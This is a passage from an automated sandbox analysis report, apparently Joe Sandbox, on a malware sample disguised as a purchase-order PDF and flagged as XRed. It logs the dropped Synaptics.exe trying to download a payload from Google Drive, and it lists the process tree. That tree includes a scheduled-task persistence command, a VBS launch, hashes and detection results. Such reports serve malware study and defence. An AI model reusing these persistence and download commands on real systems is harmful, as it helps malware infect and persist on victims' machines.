                                                                                                                      2024-12-30 10:41:08 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      104192.168.2.650097142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:16 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:16 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7pQmvK7rIgovYK0kF5mtey_G-PzyALnWGOpQnJFItVyAcUpL3uR8rNFyfvevBFCvOR
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:16 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SELyxZVyxKIac3XXmW1Pfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:16 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:16 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 71 57 32 4b 31 5a 4a 35 38 64 48 2d 75 52 49 70 43 6c 39 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="EqW2K1ZJ58dH-uRIpCl9cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:16 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      105192.168.2.650093142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:16 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:16 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-860HS0jj_r002CWUH-0Ofw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      106192.168.2.650091142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:16 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:17 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6R6v887du7yFWK-XOO73OpzxQKUe_nHEJIzLTszQ79hYMngt-TmKzYKyg6p_GJkr3w
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:16 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-FHDGDe9qD_cptlMcLJboGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:17 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:17 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 39 78 49 74 47 56 59 45 59 4a 56 71 77 34 41 6e 6a 59 6d 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="n9xItGVYEYJVqw4AnjYmPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:17 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      107192.168.2.650089142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:16 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:16 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-12Ixnu0Cjem6RvUK5Wvclw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:05:40:25
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:2'203'648 bytes
                                                                                                                      MD5 hash:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:05:40:26
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe"
                                                                                                                      Imagebase:0xb40000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:05:40:27
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:771'584 bytes
                                                                                                                      MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:05:40:28
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                      Imagebase:0xcc0000
                                                                                                                      File size:53'161'064 bytes
                                                                                                                      MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:05:40:28
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                                                                                                                      Imagebase:0x1c0000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:05:40:28
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:05:40:28
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                                                                                                                      Imagebase:0x9f0000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3396869708.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3397773164.0000000002C10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3396869708.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:05:40:29
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                                                                                                                      Imagebase:0x710000
                                                                                                                      File size:187'904 bytes
                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:05:40:29
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:12
                                                                                                                      Start time:05:40:36
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:771'584 bytes
                                                                                                                      MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:14
                                                                                                                      Start time:05:40:44
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:15
                                                                                                                      Start time:05:40:53
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:17
                                                                                                                      Start time:05:41:01
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:20
                                                                                                                      Start time:05:41:06
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

